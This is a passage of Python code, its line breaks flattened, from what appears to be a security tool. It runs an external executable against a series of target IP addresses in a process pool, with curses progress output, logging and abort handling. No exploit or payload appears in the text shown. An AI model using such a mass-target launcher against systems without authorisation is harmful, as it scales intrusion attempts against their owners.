this loop as done count = len(procs) tested += 1 try: # start and display current process e_args += [target_ip] stdscr.addstr(0, 0, progress + '\n', curses.A_BOLD | curses.color_pair(1)) stdscr.addstr(2, 0, ' '.join(e_args) + '\n', curses.color_pair(3)) stdscr.addstr(4, 0, status, curses.color_pair(2)) proc = subprocess.Popen(e_args, stdout=logfile, stderr=logfile) procs.append(proc) # continue to next target e_args.remove(target_ip) time.sleep(.11) # process pool if count == jobs: # if returned any exit code, consider the process as done for item in procs: item.communicate() if item.returncode is not None: item.kill() procs = [] except (EOFError, KeyboardInterrupt, SystemExit): curses.endwin() for item in procs: if item.pid is not None: item.kill() logfile.close() console.print_error("[-] Task aborted") # killall running processes check_kill_process(exec_path) return # close logfile, exit curses window, and print done flag curses.endwin() logfile.close() os.chdir(SESSION.init_dir) console.print_success('\n[+] All done!\n')